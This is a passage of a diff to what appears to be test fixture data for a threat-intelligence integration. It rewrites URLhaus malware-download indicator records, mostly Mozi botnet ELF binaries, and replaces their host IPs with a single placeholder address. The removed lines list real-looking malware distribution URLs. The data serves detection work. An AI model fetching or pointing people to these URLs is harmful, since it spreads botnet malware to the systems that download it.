listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025853Z", + "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://89.160.20.156:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9151,18 +9151,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.234.186.111:40084/Mozi.m", + "original": "http://89.160.20.156:40084/Mozi.m", "scheme": "http", "port": 40084, - "domain": "42.234.186.111", - "full": "http://42.234.186.111:40084/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40084/Mozi.m" }, - "ip": "42.234.186.111" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693226704Z", - "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://42.234.186.111:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.186.111\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025859900Z", + "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://89.160.20.156:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9200,18 +9200,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.73.109:60457/Mozi.m", + "original": "http://89.160.20.156:60457/Mozi.m", "scheme": "http", "port": 60457, - "domain": "58.249.73.109", - "full": "http://58.249.73.109:60457/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60457/Mozi.m" }, - "ip": "58.249.73.109" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693230802Z", - "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://58.249.73.109:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.73.109\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025866800Z", + "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://89.160.20.156:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9249,18 +9249,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.41.5.197:34906/Mozi.a", + "original": "http://89.160.20.156:34906/Mozi.a", "scheme": "http", "port": 34906, - "domain": "27.41.5.197", - "full": "http://27.41.5.197:34906/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34906/Mozi.a" }, - "ip": "27.41.5.197" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693234559Z", - "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://27.41.5.197:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.41.5.197\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025873700Z", + "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://89.160.20.156:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9298,18 +9298,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://176.113.161.71:59847/Mozi.m", + "original": "http://89.160.20.156:59847/Mozi.m", "scheme": "http", "port": 59847, - "domain": "176.113.161.71", - "full": "http://176.113.161.71:59847/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59847/Mozi.m" }, - "ip": "176.113.161.71" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693238086Z", - "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://176.113.161.71:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"176.113.161.71\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025880600Z", + "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://89.160.20.156:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9347,18 +9347,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://122.165.112.82:47873/Mozi.m", + "original": "http://89.160.20.156:47873/Mozi.m", "scheme": "http", "port": 47873, - "domain": "122.165.112.82", - "full": "http://122.165.112.82:47873/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47873/Mozi.m" }, - "ip": "122.165.112.82" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693241412Z", - "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://122.165.112.82:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"122.165.112.82\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025887700Z", + "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://89.160.20.156:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9396,18 +9396,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.12.28:48645/Mozi.m", + "original": "http://89.160.20.156:48645/Mozi.m", "scheme": "http", "port": 48645, - "domain": "125.44.12.28", - "full": "http://125.44.12.28:48645/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48645/Mozi.m" }, - "ip": "125.44.12.28" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693244628Z", - "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://125.44.12.28:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.12.28\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025894500Z", + "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://89.160.20.156:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9445,18 +9445,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.56.112.117:36524/Mozi.a", + "original": "http://89.160.20.156:36524/Mozi.a", "scheme": "http", "port": 36524, - "domain": "120.56.112.117", - "full": "http://120.56.112.117:36524/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36524/Mozi.a" }, - "ip": "120.56.112.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693248225Z", - "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://120.56.112.117:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.56.112.117\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025901400Z", + "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://89.160.20.156:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9494,18 +9494,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.192.227.212:38726/Mozi.m", + "original": "http://89.160.20.156:38726/Mozi.m", "scheme": "http", "port": 38726, - "domain": "117.192.227.212", - "full": "http://117.192.227.212:38726/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38726/Mozi.m" }, - "ip": "117.192.227.212" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693251521Z", - "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://117.192.227.212:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.192.227.212\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025908100Z", + "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://89.160.20.156:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9543,18 +9543,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.209.116:41149/Mozi.m", + "original": "http://89.160.20.156:41149/Mozi.m", "scheme": "http", "port": 41149, - "domain": "120.85.209.116", - "full": "http://120.85.209.116:41149/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41149/Mozi.m" }, - "ip": "120.85.209.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693254887Z", - "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://120.85.209.116:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.209.116\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025916700Z", + "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://89.160.20.156:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9592,18 +9592,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.4.140.121:46993/Mozi.m", + "original": "http://89.160.20.156:46993/Mozi.m", "scheme": "http", "port": 46993, - "domain": "123.4.140.121", - "full": "http://123.4.140.121:46993/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46993/Mozi.m" }, - "ip": "123.4.140.121" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693258193Z", - "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://123.4.140.121:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.140.121\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025924Z", + "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://89.160.20.156:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9641,18 +9641,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.47.246.253:39190/Mozi.m", + "original": "http://89.160.20.156:39190/Mozi.m", "scheme": "http", "port": 39190, - "domain": "125.47.246.253", - "full": "http://125.47.246.253:39190/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39190/Mozi.m" }, - "ip": "125.47.246.253" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693261560Z", - "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://125.47.246.253:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.47.246.253\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025931Z", + "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://89.160.20.156:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9690,18 +9690,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.59.222.67:48344/Mozi.a", + "original": "http://89.160.20.156:48344/Mozi.a", "scheme": "http", "port": 48344, - "domain": "115.59.222.67", - "full": "http://115.59.222.67:48344/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48344/Mozi.a" }, - "ip": "115.59.222.67" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693264746Z", - "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://115.59.222.67:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.59.222.67\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025937900Z", + "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://89.160.20.156:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9740,18 +9740,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://125.133.102.126:58427/bin.sh", + "original": "http://89.160.20.156:58427/bin.sh", "scheme": "http", "port": 58427, - "domain": "125.133.102.126", - "full": "http://125.133.102.126:58427/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58427/bin.sh" }, - "ip": "125.133.102.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693267872Z", - "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://125.133.102.126:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"125.133.102.126\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.025944900Z", + "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://89.160.20.156:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9789,18 +9789,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.55.179.98:41921/i", + "original": "http://89.160.20.156:41921/i", "scheme": "http", "port": 41921, - "domain": "115.55.179.98", - "full": "http://115.55.179.98:41921/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41921/i" }, - "ip": "115.55.179.98" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693271078Z", - "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://115.55.179.98:41921/i\",\"url_status\":\"online\",\"host\":\"115.55.179.98\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025951800Z", + "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://89.160.20.156:41921/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9839,18 +9839,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://115.58.39.251:47140/bin.sh", + "original": "http://89.160.20.156:47140/bin.sh", "scheme": "http", "port": 47140, - "domain": "115.58.39.251", - "full": "http://115.58.39.251:47140/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47140/bin.sh" }, - "ip": "115.58.39.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693274234Z", - "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://115.58.39.251:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"115.58.39.251\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025958700Z", + "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://89.160.20.156:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9888,18 +9888,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.3.126.151:34789/Mozi.m", + "original": "http://89.160.20.156:34789/Mozi.m", "scheme": "http", "port": 34789, - "domain": "61.3.126.151", - "full": "http://61.3.126.151:34789/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34789/Mozi.m" }, - "ip": "61.3.126.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693277359Z", - "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://61.3.126.151:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.3.126.151\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025965700Z", + "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://89.160.20.156:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9937,18 +9937,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.94.182.91:37634/Mozi.m", + "original": "http://89.160.20.156:37634/Mozi.m", "scheme": "http", "port": 37634, - "domain": "59.94.182.91", - "full": "http://59.94.182.91:37634/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37634/Mozi.m" }, - "ip": "59.94.182.91" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693280405Z", - "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://59.94.182.91:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.94.182.91\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025972500Z", + "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://89.160.20.156:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9986,18 +9986,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.65:41636/Mozi.m", + "original": "http://89.160.20.156:41636/Mozi.m", "scheme": "http", "port": 41636, - "domain": "58.249.22.65", - "full": "http://58.249.22.65:41636/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41636/Mozi.m" }, - "ip": "58.249.22.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693284413Z", - "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://58.249.22.65:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.65\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025979400Z", + "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://89.160.20.156:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
